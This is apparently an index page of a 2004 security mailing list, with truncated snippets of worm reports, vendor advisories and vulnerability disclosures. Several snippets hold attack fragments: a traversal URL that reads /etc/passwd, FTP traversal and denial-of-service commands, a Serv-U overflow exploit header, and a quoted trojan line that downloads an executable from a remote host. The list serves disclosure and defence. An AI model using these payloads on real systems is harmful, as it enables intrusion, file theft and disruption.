-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

MyDoom.B Rapidly Spreading

Mydoom.B is a new variant of the Mydoom worm and is about 29,184
bytes. This variant attempts to perform a Distributed Denial of
Service (DDoS) attack against Microsoft.com. Details regarding this
new worm are

[ more ]  [ reply ]

/*

*-----------------------------------------------------------------------

*

* Servu.c - Serv-U FTPD 3.x/4.x "SITE CHMOD" Command

* Remote stack buffer overflow exploit

*

* Copyright (C) 2004 HUC All Rights Reserved.

*

* Author : lion

* : lion (at) cnhonker (dot) net [email concealed]

* : http://

[ more ]  [ reply ]

Donato Ferrante

Application: ChatterBox
http://www.urbancities.net/burton/

Version: 2.0

Bug: Denial Of Service

Author: Donato Ferrante
e-mail: fdonato (at) autistici (dot) org [email concealed]
web: www.autistici.org/fdonato

xxx

[ more ]  [ reply ]

APACHE HTTPD SERVER (current version 2.0.47):

##########################################################

How to return files in a Apache Deny All directory.

The Directives controlling host access may be bypassed even

if they have not permission to be override.

11 Jan 2004

DESCRIPTION

[ more ]  [ reply ]

Directory Traversal in Aprox PHP Portal.

Aprox PHP Portal from www.aprox.de allows to view all files on the system.

Exploit URL:

http://targethost/index.php?show=/etc/passwd

Zero X member of www.lobnan.de and www.lostkey.org

[ more ]  [ reply ]

Vulnerable: libtool <1.5.2
Not Vulnerable: libtool 1.5.2
Project website: http://www.gnu.org/software/libtool/libtool.html

Description of libtool (from website):
"GNU libtool is a generic library support script. Libtool hides the
complexity of using shared libraries behind a consistent, porta

[ more ]  [ reply ]

The document contains information and reverse engineering bits of the
Mydoom worms, refuting claims and rumors about them with facts.

It updates http://www.math.org.il/newworm-digest1.txt.

Also, we provide proof within the document of the DDoS attack that many
in the world now report does not ha

[ more ]  [ reply ]

Vulnerabilities in Crob FTP Server V3.5.1

Directory Disclosure:

You can read all directories on the system.

use this command: dir ../../../../../*

DoS Vulnerability:

use this command:

dir ........................................................................
..................

[ more ]  [ reply ]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- -----------------------------------------------------------------------
Fedora Legacy Update Advisory

Synopsis: Updated tcpdump resolves security vulnerability
Advisory ID: FLSA:1222
Issue date: 2004-01-31
Product

[ more ]  [ reply ]

The past Trojan horses which spread this way took advantage of the fact
web servers send an HTML 404 message if a file doesn't exist.

The original sample - britney.jpg - was simply an html file itself, and
using that fact, and IE loading it. It was combined with one of the
latest exploits of the

[ more ]  [ reply ]

======================================================================
Security Corporation Security Advisory [SCSA-027]

PHP-Nuke 6.9 SQL Injection Vulnerability
======================================================================

PROGRAM: PHP-Nuke
HOMEPAGE: http://www.phpnuke.org
VULNERABLE VER

[ more ]  [ reply ]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- -----------------------------------------------------------------------
Fedora Legacy Update Advisory

Synopsis: Updated ethereal resolves security vulnerabilities
Advisory ID: FLSA:1193
Issue date: 2004-01-31
Prod

[ more ]  [ reply ]

0verkill - little simple vulnerability.

I. Entry.

Vulnerability is game 0verkill. There is some little bugs in
clinet / server.

II. Vulnerability details.

a) client:

Vulnerability function is load_cfg(), save_cfg() and maybe
send_message().
There is simple buffer overflow bugs:

"i

[ more ]  [ reply ]

platform:
linux 2.4 i386
pachages: qmail+sqwebmail+qmailadmin+vpopmail-vchkpw-auth.

When user root try loggin in on the web on http://domain/cgi-bin/sqwebmail,
if does it with right root password, sqwebmail gives an error "maildir
doesn't exist or has incorrect ownership or permission". This, O

[ more ]  [ reply ]

One of my stupid Windows servers has been hacked, and was running Serv-U
FTP with a login message of "This Pubstro Hacked By Mediax!"

I found what Pubstro's are, but when searching through the files in the
Serv-U folder, I found this in the install.log

CoDeX-W0rm has infiltrated the system succesf

[ more ]  [ reply ]

Read the link, really interesting. There's a tiny mistake there tho, on
the example. 97 + 112 does not equal 224, no matter what. I was coding a
PERL script to decrypt the passwords, and I took the 'pa' '74E0'
example, since I was a bit lazy to code a "crypter". Well, here's a PERL
script that will

[ more ]  [ reply ]

In-Reply-To: <Pine.BSF.4.58.0401290056100.39640 (at) erfrnepu.fhfcvpvbhf (dot) bet [email concealed]>

This is a lame trojan? trying to exploit the Windows Media Player/Internet Explorer vulnerability (greetz to Liu Die Yu)

x.Open("GET", "http://www.****.ru/dan/updatte.exe",0);

[...]

s.SaveToFile("C:\\Program Files\\Window

[ more ]  [ reply ]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
--
Debian Security Advisory DSA 431-1 security (at) debian (dot) org [email concealed]
http://www.debian.org/security/ Matt Zimmerman
February 1st, 2004

[ more ]  [ reply ]

Product:
Web Blog 1.1 Remote Execute Commands Bug

Affected Versions:
1.1.5

Bug:
Command Remote Execution

Credits:
n3rd - Lit Security Solutions (LiSS)
#Affix in irc.brasnet.org

Vendor:
http://leifwright.com

Exploiting:
http://address/directory/blog.cgi?submit=ViewFile&month=[month]&year=[ye
ar]&

[ more ]  [ reply ]